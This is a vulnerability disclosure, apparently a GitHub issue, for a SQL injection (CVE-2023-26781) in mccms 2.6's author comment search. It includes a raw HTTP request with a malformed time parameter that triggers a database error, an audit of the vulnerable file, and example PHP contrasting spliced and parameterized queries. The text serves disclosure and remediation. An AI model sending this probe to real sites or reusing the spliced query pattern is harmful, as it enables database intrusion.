CVE-2023-26781: SQL injection exists in your project · Issue #1 · chshcms/mccms
SQL injection vulnerability in mccms 2.6 allows remote attackers to run arbitrary SQL commands via Author Center ->Reader Comments ->Search.
Hello, we found that your project has a SQL injection vulnerability. The details are as follows.
- Vulnerability function point: Author Center -> Reader Comments -> Search
- Vulnerability details
HTTP raw packet:
POST /index.php/author/comment HTTP/1.1
Host: 192.168.43.227:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie:
Referer: http://192.168.43.227:81/index.php/author/comment
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
name=123&time=%5c%19%22%5c%28
Check the response after sending the packet: the database throws an exception, which shows that the value of the time parameter reached the SQL query unescaped.
- Code audit
Following the function route, we can locate the file sys/apps/controllers/author/comment.php. Next, locate where the time parameter is read. The time parameter is appended to $wh[] and then spliced into sqlstr, which causes the SQL injection.
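The following is an added example, not code from mccms, that shows the pattern the audit describes (a search filter concatenated into $wh[] and then into the SQL string) next to a parameterized version of the same search. It assumes a hypothetical comments table with name, time and content columns and uses an in-memory SQLite database through PDO so it runs stand-alone; all rows are constructed.

```php
<?php
// Added example (not mccms code). The `comments` table, its columns and
// the rows below are constructed for the demonstration.

// --- Pattern described in the audit: request values concatenated into $wh[] ---
function buildWhereSpliced(array $input): string
{
    $wh = [];
    if (isset($input['name']) && $input['name'] !== '') {
        $wh[] = "name LIKE '%" . $input['name'] . "%'";
    }
    if (isset($input['time']) && $input['time'] !== '') {
        $wh[] = "time = '" . $input['time'] . "'";   // raw value becomes part of the SQL text
    }
    return $wh ? ' WHERE ' . implode(' AND ', $wh) : '';
}

// --- Hardened form: validate the expected shape, bind every value ---
function searchComments(PDO $pdo, array $input): array
{
    $wh = [];
    $params = [];

    if (isset($input['name']) && $input['name'] !== '') {
        $wh[] = 'name LIKE :name';
        $params[':name'] = '%' . $input['name'] . '%';   // bound, never spliced
    }
    if (isset($input['time']) && $input['time'] !== '') {
        // The filter is a calendar date; reject anything that does not
        // round-trip through a strict Y-m-d parse before it reaches the query.
        $d = DateTime::createFromFormat('Y-m-d', $input['time']);
        if ($d === false || $d->format('Y-m-d') !== $input['time']) {
            throw new InvalidArgumentException('time must be a Y-m-d date');
        }
        $wh[] = 'time = :time';
        $params[':time'] = $input['time'];
    }

    $sql = 'SELECT id, name, time, content FROM comments'
         . ($wh ? ' WHERE ' . implode(' AND ', $wh) : '')
         . ' ORDER BY time DESC';
    $stmt = $pdo->prepare($sql);   // placeholders keep data separate from SQL text
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- Stand-alone demonstration with constructed data ---
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE comments (id INTEGER PRIMARY KEY, name TEXT, time TEXT, content TEXT)');
$pdo->exec("INSERT INTO comments (name, time, content) VALUES
    ('reader123', '2023-02-01', 'first'),
    ('reader123', '2023-02-02', 'second'),
    ('other',     '2023-02-02', 'third')");

// Well-formed search: both filters are bound parameters.
$rows = searchComments($pdo, ['name' => '123', 'time' => '2023-02-02']);
echo count($rows) . " row(s) for name=123, time=2023-02-02\n";   // 1 row

// The malformed time value from the packet above (\ 0x19 " \ () is rejected
// by validation, so it never reaches the database and no database error
// is returned to the client.
$bad = ['name' => '123', 'time' => "\\\x19\"\\("];
try {
    searchComments($pdo, $bad);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ' . $e->getMessage() . "\n";
}

// For comparison, the WHERE clause the spliced pattern would build from the
// same input (printed only, not executed): the bytes land inside the SQL text.
echo buildWhereSpliced($bad) . "\n";
```

Two things in the hardened version matter for this bug class: the query text never contains request data (prepare/execute with named placeholders), and the time filter is checked against the shape the feature actually expects, so malformed input is refused with an application-level error instead of surfacing a database exception to the client.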